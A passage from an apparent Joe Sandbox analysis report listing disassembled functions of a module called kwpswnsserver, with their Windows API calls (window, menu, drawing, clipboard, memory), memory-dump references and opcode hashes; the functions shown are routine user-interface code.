                                                                  • SendMessageW.USER32(?,00000476,00000000,00000000), ref: 6C8AC0CA
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6C8AC0D5
                                                                  • RemovePropW.USER32(?), ref: 6C8AC0E4
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6C8AC0EF
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6C8AC111
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 6C8AC122
                                                                  • SendMessageW.USER32(?,00000475,00000000,?), ref: 6C8AC14A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Global$MessagePropSendUnlock$AsyncFreeLockRemoveState
                                                                  • String ID:
                                                                  • API String ID: 723318029-0
                                                                  • Opcode ID: 951e0425251b961c64387ea6e7392c4a79cca8f6606aeb4894aad273b348090d
                                                                  • Instruction ID: 135ea5eb93b8cfc2025c696d330de17eb4955a0ca49d8a02e573f77364b857f9
                                                                  • Opcode Fuzzy Hash: 951e0425251b961c64387ea6e7392c4a79cca8f6606aeb4894aad273b348090d
                                                                  • Instruction Fuzzy Hash: 5521C231301316ABDF393FB2CD19B163679BF0638DF108929F506D2A52DB72D812CA90
                                                                  Function 6C8AC5AA Relevance: 13.6, APIs: 9, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 6C8AC5C5
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 6C8AC5D4
                                                                  • IsWindowEnabled.USER32(00000000), ref: 6C8AC5E2
                                                                  • GetDlgItem.USER32(?,00003024), ref: 6C8AC5F9
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 6C8AC605
                                                                  • IsWindowEnabled.USER32(?), ref: 6C8AC615
                                                                  • GetFocus.USER32 ref: 6C8AC636
                                                                  • IsWindowEnabled.USER32(00000000), ref: 6C8AC63D
                                                                  • SetFocus.USER32(?), ref: 6C8AC64A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Enabled$FocusItemLong
                                                                  • String ID:
                                                                  • API String ID: 1558694495-0
                                                                  • Opcode ID: cbde522686041d0381dfcfb5a1e1d57935eb0070db90f1b06922c9605b8955c1
                                                                  • Instruction ID: 132f01240db93e2c1774b2edba264a2479fb9492f38864a9a03d28e6c3056ad7
                                                                  • Opcode Fuzzy Hash: cbde522686041d0381dfcfb5a1e1d57935eb0070db90f1b06922c9605b8955c1
                                                                  • Instruction Fuzzy Hash: 2F11F632700236ABDB297FA8CD48B5E7B78FF46359B144618F915D2161EB32DC12DB80
                                                                  Function 6C8B0937 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_catch.LIBCMT ref: 6C8B0941
                                                                    • Part of subcall function 6C8FE220: __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                  • IsWindow.USER32(?), ref: 6C8B0A74
                                                                    • Part of subcall function 6C89BB93: GetDlgCtrlID.USER32(?), ref: 6C89BB9E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CtrlH_prolog3H_prolog3_catchWindow
                                                                  • String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$Buttons$MFCToolBars$Name
                                                                  • API String ID: 1537839037-190999575
                                                                  • Opcode ID: c435f3bb0c47aeffb5fc7cb8861a163123500a56fd9a950e2ad0042034c4db9d
                                                                  • Instruction ID: 98d0e2d2f634933b495d7b9db2ce97cf3cad1113f367d88523111d7db349ae18
                                                                  • Opcode Fuzzy Hash: c435f3bb0c47aeffb5fc7cb8861a163123500a56fd9a950e2ad0042034c4db9d
                                                                  • Instruction Fuzzy Hash: AE71A270A0021DDFCF15DFA8CA50AEDBBB5AF49318F104469E815B7790DB309E05CB61
                                                                  Function 6C8C6ADF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 151COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000004C), ref: 6C8C6B69
                                                                  • GetSystemMetrics.USER32(0000004D), ref: 6C8C6B74
                                                                  • GetSystemMetrics.USER32(0000004E), ref: 6C8C6B7F
                                                                  • GetSystemMetrics.USER32(0000004F), ref: 6C8C6B8D
                                                                  • IntersectRect.USER32(?,?,?), ref: 6C8C6BE6
                                                                  • IntersectRect.USER32(?,?,?), ref: 6C8C6C41
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$IntersectRect
                                                                  • String ID: "
                                                                  • API String ID: 1124862357-123907689
                                                                  • Opcode ID: 0512e2b71d6c667fe3526de7a06f124d6a637dde1b45d4272d3f837f3c1303de
                                                                  • Instruction ID: 275f56d03fdd9eb949932ac50af3960d041b685e1436f293a33f31ee8e050a20
                                                                  • Opcode Fuzzy Hash: 0512e2b71d6c667fe3526de7a06f124d6a637dde1b45d4272d3f837f3c1303de
                                                                  • Instruction Fuzzy Hash: A161A572A01209DFCF54DFA8D9C4A9DBBF4FF09314B11856AE905EB205EB31E980CB54
                                                                  Function 6C8D229F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8D22A6
                                                                    • Part of subcall function 6C8D222C: GetObjectW.GDI32(?,00000018,?), ref: 6C8D2249
                                                                  • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 6C8D2342
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C8D236B
                                                                  • SelectObject.GDI32(?,?), ref: 6C8D2380
                                                                  • SelectObject.GDI32(?,?), ref: 6C8D2416
                                                                  • DeleteObject.GDI32(?), ref: 6C8D242E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateSelect$CompatibleDeleteH_prolog3_Section
                                                                  • String ID: (
                                                                  • API String ID: 2192781631-3887548279
                                                                  • Opcode ID: d097a18ab297646c8c93b14a47799effdfbe3cb06c3644d78cc86602b27f79f9
                                                                  • Instruction ID: 6859cfe615d4d734c98b7b73f9609364dd75507447f9e5038f7a360555aa1d55
                                                                  • Opcode Fuzzy Hash: d097a18ab297646c8c93b14a47799effdfbe3cb06c3644d78cc86602b27f79f9
                                                                  • Instruction Fuzzy Hash: 68514B75E00618DFCB29DFA8C954AADBBB1FF48304F14812DE416A7390DB34A906CF40
                                                                  Function 6C8A64C6 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(uxtheme.dll,?,?,6C89F1C3,?,00000000,?,?,?,000000FF,?,?,00000040), ref: 6C8A64D8
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeTextEx), ref: 6C8A64E8
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C89F1C3,?,00000000,?,?,?,000000FF,?,?,00000040), ref: 6C8A64F1
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C89F1C3,?,00000000,?,?,?,000000FF,?,?,00000040), ref: 6C8A64FF
                                                                  • DrawThemeText.UXTHEME(?,?,?,?,?,?,?,00000000,?,?,?,6C89F1C3,?,00000000,?,?), ref: 6C8A654C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeDrawEncodeHandleModuleProcTextTheme
                                                                  • String ID: DrawThemeTextEx$uxtheme.dll
                                                                  • API String ID: 1727381832-3035683158
                                                                  • Opcode ID: 850b69f689cd33c36a812307c7e0509486a60d915dc404e13261d3cb54d9b1fb
                                                                  • Instruction ID: 6e0775e5e6273a16325ee5171e117ce3f8938ffd2615568a81aba2520a782b13
                                                                  • Opcode Fuzzy Hash: 850b69f689cd33c36a812307c7e0509486a60d915dc404e13261d3cb54d9b1fb
                                                                  • Instruction Fuzzy Hash: 0F11F33224122AFFCF265FA4CD189DA3F76FF09B55B448510FE19A2524C736C962EB90
                                                                  Function 6C8BC3C0 Relevance: 12.3, APIs: 8, Instructions: 253windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(000000FF), ref: 6C8BC3E1
                                                                  • SendMessageW.USER32(000000FF,00000362,0000E001,00000000), ref: 6C8BC41D
                                                                    • Part of subcall function 6C8BC6D2: GetParent.USER32(000000FF), ref: 6C8BC6E2
                                                                  • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C8BC43C
                                                                  • GetParent.USER32(000000FF), ref: 6C8BC4F5
                                                                  • PostMessageW.USER32(?,?,?,00000000), ref: 6C8BC5A9
                                                                  • GetParent.USER32(000000FF), ref: 6C8BC613
                                                                  • InvalidateRect.USER32(000000FF,000000FF,00000001,000000FF,?,?), ref: 6C8BC68C
                                                                  • UpdateWindow.USER32(000000FF), ref: 6C8BC698
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Parent$Message$Send$InvalidatePostRectUpdateWindow
                                                                  • String ID:
                                                                  • API String ID: 4048132615-0
                                                                  • Opcode ID: 0e8a3b8e96bcee265c554ba69a3661e27f372f3e0dd1bbb4be942e5620424c1d
                                                                  • Instruction ID: 1ea74be5c05f383e556da2d6e72e5c25a0d14322071a975be153b602d86aa202
                                                                  • Opcode Fuzzy Hash: 0e8a3b8e96bcee265c554ba69a3661e27f372f3e0dd1bbb4be942e5620424c1d
                                                                  • Instruction Fuzzy Hash: 19919331B0121A9FDB24AF68CE54ABE7BB9BF49308B104969E405F7B91DF709D018B90
                                                                  Function 6C90E4AB Relevance: 12.2, APIs: 8, Instructions: 169windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CaptureDestroyEmptyMessageParentPointsRectReleaseSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3509494761-0
                                                                  • Opcode ID: 06e5d59770e2d8e7f8886a0a4ad8d3eb48635c346161fb2569357bc1ddfb1042
                                                                  • Instruction ID: c20dd22588a7a3bc722fa5a89b7266069c7bed028dc1454bd5d6b15f54468fe1
                                                                  • Opcode Fuzzy Hash: 06e5d59770e2d8e7f8886a0a4ad8d3eb48635c346161fb2569357bc1ddfb1042
                                                                  • Instruction Fuzzy Hash: B3519D307007199BDF059F24C898BAE3BB9BF45709F4445BDEC4A9B681EB71E905CB90
                                                                  Function 6C90406D Relevance: 12.1, APIs: 8, Instructions: 135clipboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 6C904074
                                                                    • Part of subcall function 6C883E38: __EH_prolog3.LIBCMT ref: 6C883E3F
                                                                    • Part of subcall function 6C883E38: GetWindowDC.USER32(00000000,00000004,6C89E3DA,00000000), ref: 6C883E6B
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C90409A
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C9040C0
                                                                    • Part of subcall function 6C883C26: SelectObject.GDI32(6C88F6CB,?), ref: 6C883C2F
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C904112
                                                                  • OpenClipboard.USER32(?), ref: 6C90416C
                                                                  • EmptyClipboard.USER32 ref: 6C9041AC
                                                                  • SetClipboardData.USER32(00000002,00000000), ref: 6C9041D0
                                                                  • CloseClipboard.USER32 ref: 6C9041EA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$CompatibleCreate$BitmapCloseDataEmptyFillH_prolog3H_prolog3_catch_ObjectOpenRectSelectWindow
                                                                  • String ID:
                                                                  • API String ID: 2940850299-0
                                                                  • Opcode ID: 5d84d98b2bc579c6daa4f07835b1199f3b6de05d6499cc362d72b5d8706b5d9c
                                                                  • Instruction ID: 8dd7eed1f8796eee09bb02760f6da9c1fadc15b944df7025d6802a17eae5494b
                                                                  • Opcode Fuzzy Hash: 5d84d98b2bc579c6daa4f07835b1199f3b6de05d6499cc362d72b5d8706b5d9c
                                                                  • Instruction Fuzzy Hash: 0F419171E05225ABCB25DFE8CD44DDEBB78AF25708F008529F415A7B90DB709A08CF60
                                                                  Function 6C8D0328 Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8D032F
                                                                  • GetSysColor.USER32(00000017), ref: 6C8D034C
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 6C8D036F
                                                                  • DrawThemeBackground.UXTHEME(?,?,00000001,00000000,?,00000000), ref: 6C8D0392
                                                                  • GetThemeColor.UXTHEME(?,00000001,00000000,00000EDB,?), ref: 6C8D03A7
                                                                  • GetThemeColor.UXTHEME(?,00000001,00000000,00000EDC,?), ref: 6C8D03BC
                                                                  • GetSysColorBrush.USER32(00000018), ref: 6C8D03C6
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 6C8D03D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Theme$Rect$BackgroundBrushDrawFillH_prolog3_Inflate
                                                                  • String ID:
                                                                  • API String ID: 229325109-0
                                                                  • Opcode ID: 9818fc2bcf230c3c4f3bf0a858e77c7599a1feff2891fab66f5b605ba42c9258
                                                                  • Instruction ID: b60893750fb9509ed48249f20859d0ade2f235325d289918e2421179b0bfc694
                                                                  • Opcode Fuzzy Hash: 9818fc2bcf230c3c4f3bf0a858e77c7599a1feff2891fab66f5b605ba42c9258
                                                                  • Instruction Fuzzy Hash: C4412735A0021EAFDF14DFA4CD94EAE77B9FF09705B018869F916A7650DB70AC05CB60
                                                                  Function 6C906481 Relevance: 12.1, APIs: 8, Instructions: 101memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,00000000,00000000,?,?,6C906476,00000000,00000000,?,6CA07E7C,?,6C904753,?,?,?), ref: 6C906492
                                                                  • GlobalLock.KERNEL32(00000000), ref: 6C90649F
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6C9064AA
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6C9064B1
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6C9064CF
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000), ref: 6C9064DC
                                                                  • EnterCriticalSection.KERNEL32(6CA59B30,00000000), ref: 6C9064F5
                                                                  • LeaveCriticalSection.KERNEL32(6CA59B30,00000000), ref: 6C90655C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Global$CriticalSectionUnlock$AllocCreateEnterFreeLeaveLockStream
                                                                  • String ID:
                                                                  • API String ID: 295443201-0
                                                                  • Opcode ID: 973b056119aa0113a940f681a704e7548d4b6c96ce9f3a51ad4fae5b3ef9f190
                                                                  • Instruction ID: 5317fd6ae0b60727b2080b51863af1bc43dda588b16532b4c389b8bbd2d73115
                                                                  • Opcode Fuzzy Hash: 973b056119aa0113a940f681a704e7548d4b6c96ce9f3a51ad4fae5b3ef9f190
                                                                  • Instruction Fuzzy Hash: 9131C171B01316ABDF149B74CD58B9E37BDEB8A619F418018F906D7640EB34DA42CB91
                                                                  Function 6C8BA812 Relevance: 12.1, APIs: 8, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ScreenToClient.USER32(?,?), ref: 6C8BA82E
                                                                  • GetParent.USER32(?), ref: 6C8BA83E
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BA882
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8BA894
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BA8A4
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BA8D1
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8BA8E3
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BA8F3
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$PointsWindow$ParentScreen
                                                                  • String ID:
                                                                  • API String ID: 1944725958-0
                                                                  • Opcode ID: 260476b4a0435ed47f449adb88ea9f62015629b88277fb4942ac41586f1eaf5b
                                                                  • Instruction ID: fe168bd0a1ecdd3f590844f95333aff43834a467b785f026b8d65c1ed2ab466a
                                                                  • Opcode Fuzzy Hash: 260476b4a0435ed47f449adb88ea9f62015629b88277fb4942ac41586f1eaf5b
                                                                  • Instruction Fuzzy Hash: 7631B23260021AAFCF259FA8CD588EE7B79FF493087114625F906E7660EB31DD059B90
                                                                  Function 6C897CB4 Relevance: 12.1, APIs: 8, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuItemCount.USER32(?), ref: 6C897CBD
                                                                  • GetMenuItemCount.USER32(?), ref: 6C897CC9
                                                                  • GetSubMenu.USER32(?,-00000001), ref: 6C897CE0
                                                                  • GetMenuItemCount.USER32(00000000), ref: 6C897CF3
                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 6C897D04
                                                                  • RemoveMenu.USER32(00000000,00000000,00000400), ref: 6C897D1E
